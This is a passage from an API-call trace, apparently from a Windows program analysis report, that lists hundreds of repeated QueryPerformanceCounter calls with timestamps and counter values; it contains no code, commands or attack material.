lpPerformanceCount=0x6adfdfc*=3097148790949) returned 1 [0152.669] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097148808394) returned 1 [0152.685] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097150390447) returned 1 [0152.685] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097150407237) returned 1 [0152.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097151990061) returned 1 [0152.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097152007606) returned 1 [0152.719] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097153835754) returned 1 [0152.720] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097153859307) returned 1 [0152.733] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097155171960) returned 1 [0152.733] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097155189690) returned 1 [0152.749] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097156777481) returned 1 [0152.749] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097156798801) returned 1 [0152.765] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097158373750) returned 1 [0152.765] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097158398557) returned 1 [0152.780] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097159949142) returned 1 [0152.781] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097159967578) returned 1 [0152.796] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097161553767) returned 1 [0152.797] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097161577123) returned 1 [0152.812] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097163145752) returned 1 [0152.813] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097163162677) returned 1 [0152.828] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097164754273) returned 1 [0152.829] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097164790159) returned 1 [0152.846] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097166491922) returned 1 [0152.846] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097166509760) returned 1 [0152.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097168052630) returned 1 [0152.862] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097168098578) returned 1 [0152.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097169644807) returned 1 [0152.878] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097169658329) returned 1 [0152.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097171244381) returned 1 [0152.894] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097171257394) returned 1 [0152.909] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097172844302) returned 1 [0152.910] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097172857331) returned 1 [0152.927] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097174629466) returned 1 [0152.927] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097174643190) returned 1 [0152.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097176975577) returned 1 [0152.951] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097177000983) returned 1 [0152.966] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097178553073) returned 1 [0152.967] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097178579960) returned 1 [0152.989] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097180810912) returned 1 [0152.989] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097180834906) returned 1 [0153.004] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097182351348) returned 1 [0153.005] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097182368104) returned 1 [0153.020] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097183939114) returned 1 [0153.021] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097183966018) returned 1 [0153.036] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097185531281) returned 1 [0153.036] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097185555727) returned 1 [0153.080] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097189858952) returned 1 [0153.080] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097189887582) returned 1 [0153.080] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097189949095) returned 1 [0153.081] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097189966430) returned 1 [0153.084] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097190308109) returned 1 [0153.084] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097190331546) returned 1 [0153.102] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097192111020) returned 1 [0153.102] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097192149891) returned 1 [0153.118] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097193662124) returned 1 [0153.120] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097193906615) returned 1 [0153.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097195481242) returned 1 [0153.136] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097195498839) returned 1 [0153.152] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097197103921) returned 1 [0153.152] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097197122550) returned 1 [0153.168] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097198681478) returned 1 [0153.168] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097198702531) returned 1 [0153.184] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097200286943) returned 1 [0153.184] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097200311572) returned 1 [0153.200] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097201886375) returned 1 [0153.200] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097201907075) returned 1 [0153.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097206199457) returned 1 [0153.243] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097206225862) returned 1 [0153.244] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097206261527) returned 1 [0153.244] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097206281718) returned 1 [0153.248] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097206722522) returned 1 [0153.248] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097206739133) returned 1 [0153.264] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097208295058) returned 1 [0153.264] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097208309897) returned 1 [0153.280] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097209938991) returned 1 [0153.281] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097209955041) returned 1 [0153.296] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097211552593) returned 1 [0153.297] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097211575817) returned 1 [0153.315] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097213443381) returned 1 [0153.316] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097213465942) returned 1 [0153.331] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097214995684) returned 1 [0153.331] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097215013924) returned 1 [0153.347] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097216602287) returned 1 [0153.347] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097216626001) returned 1 [0153.363] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097218244311) returned 1 [0153.364] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097218265307) returned 1 [0153.379] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097219797511) returned 1 [0153.379] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097219822034) returned 1 [0153.395] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097221396975) returned 1 [0153.395] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097221413414) returned 1 [0153.411] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097222993758) returned 1 [0153.411] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097223010079) returned 1 [0153.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097224783009) returned 1 [0153.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097224800191) returned 1 [0153.445] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097226399380) returned 1 [0153.445] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097226422681) returned 1 [0153.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097227974272) returned 1 [0153.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097227996609) returned 1 [0153.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097229570899) returned 1 [0153.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097229587394) returned 1 [0153.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097231174052) returned 1 [0153.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097231200986) returned 1 [0153.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097232774967) returned 1 [0153.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097232796746) returned 1 [0153.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097234364894) returned 1 [0153.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097234380901) returned 1 [0153.541] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097235972677) returned 1 [0153.541] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097235996119) returned 1 [0153.557] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097237568931) returned 1 [0153.557] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097237585891) returned 1 [0153.573] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097239170091) returned 1 [0153.573] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097239187490) returned 1 [0153.589] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097240772650) returned 1 [0153.589] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097240797635) returned 1 [0153.605] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097242584399) returned 1 [0153.607] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097242643868) returned 1 [0153.621] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097243971185) returned 1 [0153.621] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097243993496) returned 1 [0153.637] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097245569422) returned 1 [0153.637] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097245587599) returned 1 [0153.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097247168896) returned 1 [0153.653] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097247186219) returned 1 [0153.669] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097248770993) returned 1 [0153.669] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097248788158) returned 1 [0153.685] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097250365855) returned 1 [0153.685] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097250380459) returned 1 [0153.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097251964319) returned 1 [0153.701] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097251978514) returned 1 [0153.717] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097253571277) returned 1 [0153.717] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097253616307) returned 1 [0153.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097255325765) returned 1 [0153.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097255351876) returned 1 [0153.749] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097256765754) returned 1 [0153.749] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097256781447) returned 1 [0153.765] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097258367280) returned 1 [0153.765] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097258381332) returned 1 [0153.781] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097259985648) returned 1 [0153.781] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097260010345) returned 1 [0153.797] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097261563722) returned 1 [0153.797] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097261577951) returned 1 [0153.813] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097263169218) returned 1 [0153.813] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097263186142) returned 1 [0153.829] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097264762085) returned 1 [0153.829] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097264775790) returned 1 [0153.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097266365783) returned 1 [0153.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097266379390) returned 1 [0153.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097267968687) returned 1 [0153.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097267984746) returned 1 [0153.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097269563498) returned 1 [0153.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097269580321) returned 1 [0153.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097271176828) returned 1 [0153.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097271201079) returned 1 [0153.909] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097272785154) returned 1 [0153.909] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097272806385) returned 1 [0153.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097274374102) returned 1 [0153.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097274414480) returned 1 [0153.940] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097275948493) returned 1 [0153.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097275965041) returned 1 [0153.956] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097277550938) returned 1 [0153.957] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097277567667) returned 1 [0153.973] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097279161925) returned 1 [0153.973] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097279186871) returned 1 [0153.988] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097280730547) returned 1 [0153.988] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097280747564) returned 1 [0154.004] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097282330018) returned 1 [0154.004] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097282345916) returned 1 [0154.020] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097283929712) returned 1 [0154.020] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097283946220) returned 1 [0154.036] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097285537343) returned 1 [0154.037] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097285559386) returned 1 [0154.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097288861156) returned 1 [0154.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097288879582) returned 1 [0154.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097288945758) returned 1 [0154.071] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097288961537) returned 1 [0154.085] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097290489511) returned 1 [0154.086] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097290520436) returned 1 [0154.100] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097291931656) returned 1 [0154.101] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097291956712) returned 1 [0154.116] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097293523323) returned 1 [0154.116] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097293550972) returned 1 [0154.132] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097295127303) returned 1 [0154.133] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097295171938) returned 1 [0154.148] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097296719454) returned 1 [0154.148] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097296735468) returned 1 [0154.164] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097298321509) returned 1 [0154.164] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097298346732) returned 1 [0154.180] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097299923642) returned 1 [0154.180] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097299945346) returned 1 [0154.196] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097301520963) returned 1 [0154.196] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097301538098) returned 1 [0154.212] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097303130386) returned 1 [0154.213] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097303155744) returned 1 [0154.229] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097304755414) returned 1 [0154.229] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097304771422) returned 1 [0154.244] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097306317141) returned 1 [0154.244] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097306333382) returned 1 [0154.260] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097307924378) returned 1 [0154.260] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097307941520) returned 1 [0154.276] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097309523885) returned 1 [0154.276] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097309541252) returned 1 [0154.292] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097311125617) returned 1 [0154.292] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097311159533) returned 1 [0154.309] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097312815337) returned 1 [0154.309] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097312833237) returned 1 [0154.325] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097314375627) returned 1 [0154.325] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097314399120) returned 1 [0154.342] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097316126151) returned 1 [0154.342] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3097316161473) returned 1 [0154.357] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 